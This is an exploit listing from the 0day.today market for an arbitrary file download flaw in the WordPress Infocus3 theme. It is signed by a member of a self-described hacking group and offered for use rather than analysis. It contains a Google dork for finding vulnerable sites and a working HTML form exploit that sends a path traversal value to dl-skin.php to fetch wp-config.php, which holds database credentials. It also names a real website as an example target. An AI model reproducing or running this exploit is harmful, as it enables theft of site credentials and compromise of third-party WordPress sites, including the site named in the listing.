[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Infocus3 Theme Arbitrary File Download Vulnerability

Author
killer~x
Risk
[
Security Risk High
]
0day-ID
0day-ID-23071
Category
web applications
Date add
05-01-2015
Platform
php
#Title : Wordpress Infocus3 Theme Arbitrary File Download Vulnerability
#Author : Killer~X  

#Date : 5/1/2015
################ [ Killer~X ] ################
Facebook : http://www.facebook.com/xXalreshyXx

Ask : http://ask.fm/ALRESHY

Twitter : https://twitter.com/killerx00x

Email : M_ox@hotmail.com or Cco@hotmail.com

################ [ Killer~X ] ################


################ [ Yemeni Electronic Army ] ################

Yemeni Electronic Army : http://yeahacker.blogspot.in/

Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.


################ [ Yemeni Electronic Army ] ################

__________________________________________________________________________________

#Vendor : www.wordpress.org

#google Dork : 
1-  inurl:/wp-content/themes/infocus3

#Tested on : windows


################################################

#Exploit : 

<html>

<body>

<form action="wp-content/themes/infocus3/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>

<input type="submit" value=Download>

</form>

</body>





#example : http://www.deliriosenbits.com/wp-content/plugins/wptouch/p8.php




__________________________________________________________________________________

#Greeting to :  All my friends 

<3 I love u mom <3 

||~ Done ~||

#  0day.today [2024-12-25]  #